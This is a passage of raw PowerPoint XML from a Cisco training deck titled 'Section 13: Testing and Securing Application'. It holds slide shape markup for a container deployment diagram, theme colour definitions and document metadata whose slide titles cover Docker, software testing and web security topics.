        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Right Arrow 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF4787F-2F83-9341-89FD-57F9C93F2160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5773474" y="1760038"/>
            <a:ext cx="1683692" cy="1055461"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514325"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>DEPLOY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF0F4ED-DEBC-0144-A0D6-BF168CCA961F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2045724" y="4286269"/>
            <a:ext cx="1356592" cy="487490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>LOCATION A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{098154AC-FCBC-864B-B112-F9B7F366F1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7722678" y="2724806"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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200">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container Y</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F8A4FC-EF7C-A341-BDCB-2B62C0E28A39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7466186" y="1813788"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E63C186-A7B4-3A46-928C-FF42BA3CFD69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7878838" y="2269297"/>
            <a:ext cx="682226"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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E14E01-7929-F94D-BAE7-82AE66ACFA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7993505" y="1813788"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00975B18-EFE7-F146-9781-1DF6BAAC3A4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8517915" y="1813788"/>
            <a:ext cx="447667" cy="310862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68569" tIns="68569" rIns="68569" bIns="68569" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="80" name="Elbow Connector 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09F528C3-C925-B84C-B931-45466EA52A39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="0"/>
            <a:endCxn id="77" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="8147628" y="2652482"/>
            <a:ext cx="144648" cy="1"/>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ED71AD9A-0375-D946-9E86-210E6AA5E5C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="77" idx="0"/>
            <a:endCxn id="76" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="7882664" y="1932007"/>
            <a:ext cx="144647" cy="529933"/>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2" name="Elbow Connector 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4131077D-0D1A-0147-AD92-300EE4C18870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="77" idx="0"/>
            <a:endCxn id="78" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="8146323" y="2195667"/>
            <a:ext cx="144647" cy="2614"/>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8626A9CB-465B-B945-AF4C-50BDFED931DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="77" idx="0"/>
            <a:endCxn id="79" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="8408528" y="1936075"/>
            <a:ext cx="144647" cy="521796"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="158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4" name="Elbow Connector 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30C8598-C511-754B-9177-921A2C2C56A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="71" idx="0"/>
            <a:endCxn id="75" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7300295" y="2440731"/>
            <a:ext cx="327557" cy="1511759"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCE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79077"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="CiscoDefault2019_new">
  <a:themeElements>
    <a:clrScheme name="Cisco Core Palette_2019_default">
      <a:dk1>
        <a:srgbClr val="282828"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="0D274D"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1E4471"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="00BCEB"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="6EBE4A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="1E4471"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="9E9EA2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FBAB18"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="E3241B"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00BCEB"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="1E4471"/>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Default2019_new" id="{325E6F76-2B22-A842-B9A8-4C6F1423CB13}" vid="{64B0626C-346C-AF4E-B059-C7C9374ACC27}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Cisco Corporate Template 2018 - DevNet">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2018 - DevNet" id="{EC8FF9A2-13EC-5642-BA01-C30BBBA70B57}" vid="{3076C56B-7129-8940-870D-D31F56EB3976}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Cisco Corporate Template 2018 - DevNet">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2018 - DevNet" id="{EC8FF9A2-13EC-5642-BA01-C30BBBA70B57}" vid="{3076C56B-7129-8940-870D-D31F56EB3976}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2_Cisco Corporate Template 2018 - DevNet">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2018 - DevNet" id="{EC8FF9A2-13EC-5642-BA01-C30BBBA70B57}" vid="{3076C56B-7129-8940-870D-D31F56EB397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2AF9C7CA45204DB0AD48EBAC72949F" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="b9bb51236dfa94c155672ab4f61b7601">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="46bca39e-3b0c-4483-a693-2ef44df71302" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1fb7ee4cab445350a2ea75914ef40792" ns2:_="">
    <xsd:import namespace="46bca39e-3b0c-4483-a693-2ef44df7130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bca39e-3b0c-4483-a693-2ef44df713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75BFB9A-323C-4770-8346-8A64229007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bca39e-3b0c-4483-a693-2ef44df7130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09E52CF-FDD6-4899-8688-874B0B127887}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{29530022-9D73-4BAF-AD58-93B020DEAC3A}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="46bca39e-3b0c-4483-a693-2ef44df71302"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>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4055</TotalTime>
  <Words>2001</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>570</Paragraphs>
  <Slides>48</Slides>
  <Notes>36</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48</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="62" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Ciscolight</vt:lpstr>
      <vt:lpstr>CiscoSans</vt:lpstr>
      <vt:lpstr>CiscoSans ExtraLight</vt:lpstr>
      <vt:lpstr>CiscoSansTT</vt:lpstr>
      <vt:lpstr>CiscoSansTT ExtraLight</vt:lpstr>
      <vt:lpstr>CiscoSansTT Heavy</vt:lpstr>
      <vt:lpstr>CiscoSansTT Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>CiscoDefault2019_new</vt:lpstr>
      <vt:lpstr>Cisco Corporate Template 2018 - DevNet</vt:lpstr>
      <vt:lpstr>1_Cisco Corporate Template 2018 - DevNet</vt:lpstr>
      <vt:lpstr>2_Cisco Corporate Template 2018 - DevNet</vt:lpstr>
      <vt:lpstr>An Introduction to Containers</vt:lpstr>
      <vt:lpstr>Virtual Machine vs. Container</vt:lpstr>
      <vt:lpstr>Containers:  How did we get here? What are we solving?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> So what are containers?</vt:lpstr>
      <vt:lpstr>Containers are...</vt:lpstr>
      <vt:lpstr>Containers are not...</vt:lpstr>
      <vt:lpstr>Container</vt:lpstr>
      <vt:lpstr>Container</vt:lpstr>
      <vt:lpstr>Getting Docker</vt:lpstr>
      <vt:lpstr>Searching for public images</vt:lpstr>
      <vt:lpstr>Ubuntu public image</vt:lpstr>
      <vt:lpstr>Running public images</vt:lpstr>
      <vt:lpstr> Understanding Hello-World </vt:lpstr>
      <vt:lpstr>Inspecting public images (what just happened?)</vt:lpstr>
      <vt:lpstr>The Dockerfile</vt:lpstr>
      <vt:lpstr>The Dockerfile continued</vt:lpstr>
      <vt:lpstr>The Dockerfile continued</vt:lpstr>
      <vt:lpstr>A ‘Containerised App’ needs all it’s dependencies</vt:lpstr>
      <vt:lpstr>Currently running containers?</vt:lpstr>
      <vt:lpstr>     Introduction to Testing  Why do we need to perform testing and secure application ??</vt:lpstr>
      <vt:lpstr>Software  Testing  Types </vt:lpstr>
      <vt:lpstr>      Unit Testing  Test the smallest units of software. The unit can be a module, function, class, procedure, and so on.   Good unit tests should have the following characteristics - Reliable - Isolated - Fast - Readable           </vt:lpstr>
      <vt:lpstr> Integration Testing Test how software components work together.  Two Approach: 1) Big Bang Approach 2) Incremental Approach – Top-down, Bottom-up, Sandwich </vt:lpstr>
      <vt:lpstr> System Testing Test the functionality of the entire system. </vt:lpstr>
      <vt:lpstr>Acceptance Testing Test if the system is ready for delivery </vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Categories of XSS Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Securing and Scaling Application Ingress Traffic</vt:lpstr>
      <vt:lpstr>Secure Socket Layer (SSL) Offloading</vt:lpstr>
      <vt:lpstr>Web Application Firewall</vt:lpstr>
      <vt:lpstr>Reverse Proxy</vt:lpstr>
      <vt:lpstr>Load Balancing </vt:lpstr>
      <vt:lpstr>Securing and Scaling DNS </vt:lpstr>
      <vt:lpstr>Network Simulation and Test Tools</vt:lpstr>
      <vt:lpstr>Cisco Virtual Devices </vt:lpstr>
      <vt:lpstr>Network Simulation Tools</vt:lpstr>
      <vt:lpstr>CML (Cisco Modeling Labs) 2.0 </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Section 13: Testing and Securing Application</dc:title>
  <dc:creator>Dakshina Chandrakar (dachandr)</dc:creator>
  <cp:lastModifiedBy>Pradeep Vaka (pvaka)</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-29T09:34:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-25T23:38:54Z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0x010100C22AF9C7CA45204DB0AD48EBAC72949F</vt:lpwstr>
  </property>
</Properties>
</file>